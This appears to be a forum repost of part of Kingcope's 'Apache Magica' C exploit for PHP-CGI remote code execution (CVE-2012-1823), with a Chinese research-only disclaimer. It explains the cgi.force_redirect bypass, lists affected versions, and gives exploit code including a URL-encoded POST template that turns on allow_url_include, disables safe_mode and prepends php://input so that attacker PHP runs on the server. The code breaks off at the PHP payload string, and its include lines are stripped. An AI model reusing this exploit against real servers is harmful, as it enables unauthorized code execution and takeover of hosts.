Apache / PHP 5.x Remote Code Execution Exploit
测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[*]/* Apache Magica by Kingcope */
[*]/* gcc apache-magika.c -o apache-magika -lssl */
[*]/* This is a code execution bug in the combination of Apache and PHP.
[*]On Debian and Ubuntu the vulnerability is present in the default install
[*]of the php5-cgi package. When the php5-cgi package is installed on Debian and
[*]Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
[*]/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
[*]the binary because this binary has a security check enabled when installed with
[*]Apache http server and this security check is circumvented by the exploit.
[*]When accessing the php-cgi binary the security check will block the request and
[*]will not execute the binary.
[*]In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
[*]check is done when the php.ini configuration setting cgi.force_redirect is set
[*]and the php.ini configuration setting cgi.redirect_status_env is set to no.
[*]This makes it possible to execute the binary bypassing the Security check by
[*]setting these two php.ini settings.
[*]Prior to this code for the Security check getopt is called and it is possible
[*]to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
[*]-d switch. If both values are set to zero and the request is sent to the server
[*]php-cgi gets fully executed and we can use the payload in the POST data field
[*]to execute arbitrary php and therefore we can execute programs on the system.
[*]apache-magika.c is an exploit that does exactly the prior described. It does
[*]support SSL.
[*]/* Affected and tested versions
[*]PHP 5.3.10
[*]PHP 5.3.8-1
[*]PHP 5.3.6-13
[*]PHP 5.3.3
[*]PHP 5.2.17
[*]PHP 5.2.11
[*]PHP 5.2.6-3
[*]PHP 5.2.6+lenny16 with Suhosin-Patch
[*]Affected versions
[*]PHP prior to 5.3.12
[*]PHP prior to 5.4.2
[*]Unaffected versions
[*]PHP 4 - getopt parser unexploitable
[*]PHP 5.3.12 and up
[*]PHP 5.4.2 and up
[*]Unaffected versions are patched by CVE-2012-1823.
[*]*/
[*]/* .
[*] /'\rrq rk
[*] . // \\ .
[*].x.//fco\\-|-
[*] '//cmtco\\zt
[*] //6meqrg.\\tq
[*]//_________\\'
[*]EJPGQO
[*]apache-magica.c by Kingcope
[*]*/
[*]
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]#include
[*]
[*]typedefstruct{
[*]int sockfd;
[*] SSL *handle;
[*] SSL_CTX *ctx;
[*]} connection;
[*]
[*]void usage(char*argv[])
[*]{
[*] printf("usage: %s " \
[*]"[--force-interpreter interpreter]\n",
[*] argv);
[*]exit(1);
[*]}
[*]
[*]char poststr[]="POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
[*]"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
[*]"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
[*]"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
[*]"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
[*]"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
[*]"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
[*]"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
[*]"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
[*]"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
[*]"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
[*]"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
[*]"Host: %s\r\n" \
[*]"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
[*]"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
[*]"Content-Type: application/x-www-form-urlencoded\r\n" \
[*]"Content-Length: %d\r\n" \
[*]"Connection: close\r\n\r\n%s";
[*]char phpstr[]="
页:
[1]